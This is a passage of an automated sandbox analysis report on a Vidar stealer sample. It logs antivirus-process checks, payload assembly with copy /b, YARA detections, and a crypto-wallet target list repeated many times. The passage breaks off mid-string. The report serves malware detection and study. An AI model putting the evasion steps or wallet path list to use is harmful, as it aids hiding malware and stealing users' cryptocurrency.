                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 229536Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "ReprintVerificationMercyRepository" Elliott Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Exhibit + Rand + Hours 229536\UJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\229536\Webster.pif 229536\Webster.pif 229536\UJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AD88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,11_2_00AD88CD
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AE4F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,11_2_00AE4F1C
                        Source: file.exe, 00000000.00000003.2093930678.00000000026C2000.00000004.00000020.00020000.00000000.sdmp, Webster.pif, 0000000B.00000000.2124599866.0000000000B36000.00000002.00000001.01000000.00000006.sdmp, Webster.pif.2.dr, Cu.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                        Source: Webster.pifBinary or memory string: Shell_TrayWnd
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AA885B cpuid 11_2_00AA885B
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AC0030 GetLocalTime,__swprintf,11_2_00AC0030
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AC0722 GetUserNameW,11_2_00AC0722
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AB416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,11_2_00AB416A
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
                        Source: Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Vidar
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Yara detected Vidar stealer
                        Source: Yara matchFile source: 11.2.Webster.pif.47f0000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Webster.pif.1b4b810.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Webster.pif.17ad098.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Webster.pif.1b4b810.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Webster.pif.17ad098.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000B.00000003.2876365347.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2876471328.00000000018B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2876421018.0000000001938000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.3322120004.0000000001B1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.3322725102.00000000047F1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.3322120004.0000000001B4B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.3321760579.0000000001795000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2876514280.0000000001B4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.3321827446.0000000001854000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Webster.pif PID: 5740, type: MEMORYSTR
                        Found many strings related to Crypto-Wallets (likely being stolen)
                        Source: Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron 